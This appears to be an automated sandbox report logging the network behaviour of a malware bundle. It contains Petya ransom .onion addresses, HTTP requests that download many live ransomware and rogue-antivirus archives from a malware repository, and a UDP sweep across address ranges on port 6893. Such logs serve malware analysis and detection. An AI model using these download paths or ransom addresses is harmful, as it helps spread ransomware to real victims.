        Source: Endermanch@Petya.A.exe, 0000002C.00000002.532115532.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/SVjaQ4d7Rk9FsfgkEC2LPDrns8goKfy17iHg3zTmFyKoqRitYFnn2AsccXJiuzhh1VLp9qoqeKHZAxn9UjXwZJ2NTttE2nmz77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777
        Source: Endermanch@Petya.A.exe, 0000002C.00000002.555456334.000000000041B000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/
        Source: Endermanch@Petya.A.exe, 0000002C.00000002.555456334.000000000041B000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: http://petya37h5tbhyvki.onion/
        Source: Endermanch@Petya.A.exe, 0000002C.00000002.555456334.000000000041B000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/http://petya37h5tbhyvki.onion/SeShutdownPrivilegeNtRaiseHardErrorNTDLL.DLL}
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 127.0.0.1
        Source: Yara matchFile source: 13.3.Fantom.exe.77e5de.0.raw.unpack, type: UNPACKEDPE
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficTCP traffic: 192.168.2.4:49731 -> 131.253.33.200:139
        Source: global trafficTCP traffic: 192.168.2.4:49747 -> 76.73.17.194:9090
        Source: global trafficTCP traffic: 192.168.2.4:49752 -> 200.87.164.69:9999
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.0:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.2:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.1:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.3:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.4:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.6:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.5:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.7:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.8:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.9:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.10:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.11:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.12:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.13:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.15:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.18:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.17:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.19:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.20:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.21:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.23:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.24:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.14:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.16:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.22:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.27:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.25:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.26:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.28:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.29:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.30:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 93.107.12.31:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.1:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.0:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.2:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.4:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.5:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.6:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.3:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.7:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.8:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.9:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.10:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.11:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.12:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.13:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.14:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.16:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.15:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.17:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.19:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.20:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.21:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.18:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.22:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.23:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.24:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.25:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.26:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.27:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.28:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.30:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.31:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 95.1.200.29:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.1:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.2:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.3:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.4:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.5:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.0:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.6:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.7:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.8:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.9:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.10:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.11:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.12:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.13:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.14:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.16:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.15:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.17:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.18:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.19:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.20:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.21:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.22:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.23:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.24:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.25:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.26:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.27:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.28:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.29:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.31:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.30:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.32:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.33:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.34:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.35:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.36:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.37:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.38:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.39:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.40:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.41:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.42:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.43:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.44:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.45:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.46:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.48:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.47:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.49:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.50:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.51:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.52:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.53:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.54:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.55:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.56:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.57:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.58:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.59:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.60:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.61:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.62:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.63:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.64:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.65:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.66:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.67:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.68:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.69:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.70:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.71:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.72:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.73:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.74:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.75:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.76:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.77:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.78:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.79:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.80:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.82:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.81:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.83:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.84:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.85:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.86:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.87:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.88:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.89:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.90:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.91:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.92:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.93:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.94:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.95:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.96:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.97:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.98:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.99:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.100:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.101:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.102:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.103:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.104:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.105:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.106:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.107:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.108:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.109:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.110:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.111:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.112:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.113:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.114:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.115:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.116:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.117:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.118:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.119:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.120:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.121:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.122:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.123:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.124:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.125:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.126:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.127:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.128:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.129:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.130:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.131:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.132:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.133:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.134:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.135:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.136:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.137:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.138:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.139:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.140:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.141:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.142:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.143:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.144:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.145:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.146:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.148:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.149:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.150:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.151:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.152:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.153:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.154:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.155:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.147:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.156:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.157:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.158:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.159:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.160:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.161:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.162:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.163:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.164:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.165:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.166:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.167:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.168:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.169:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.170:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.171:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.172:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.173:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.174:6893
